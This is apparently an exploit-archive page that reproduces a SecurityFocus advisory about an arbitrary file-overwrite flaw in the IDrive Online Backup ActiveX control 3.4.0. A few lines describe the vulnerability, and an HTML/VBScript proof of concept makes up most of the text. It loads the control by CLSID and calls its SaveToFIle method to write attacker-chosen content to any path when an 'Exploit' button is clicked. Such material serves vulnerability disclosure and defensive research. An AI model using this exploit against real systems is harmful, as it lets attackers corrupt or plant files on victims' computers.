25 lines
No EOL
936 B
HTML
25 lines
No EOL
936 B
HTML
source: https://www.securityfocus.com/bid/48582/info
|
|
|
|
Pro Softnet IDrive Online Backup ActiveX control is prone to a vulnerability that lets attackers overwrite files with arbitrary, attacker-controlled content.
|
|
|
|
An attacker can exploit this issue to corrupt and overwrite arbitrary files on a victim's computer in the context of the vulnerable application using the ActiveX control (typically Internet Explorer).
|
|
|
|
IDrive Online Backup ActiveX control 3.4.0 is vulnerable; other versions may also be affected.
|
|
|
|
<html>
|
|
<object classid='clsid:979AE8AA-C206-40EC-ACA7-EC6B6BD7BE5E' id='target' /></object>
|
|
<input language=VBScript onclick=Boom() type=button value="Exploit">
|
|
<script language = 'vbscript'>
|
|
|
|
Sub Boom()
|
|
arg1="FilePath\File_name_to_rewrite_or_create"
|
|
arg2=1
|
|
arg3="New_File_Content"
|
|
target.Text=arg3
|
|
target.SelStart=0
|
|
target.SelEnd=Len(arg3)
|
|
target.SaveToFIle arg1,arg2
|
|
End Sub
|
|
|
|
</script>
|
|
</html> |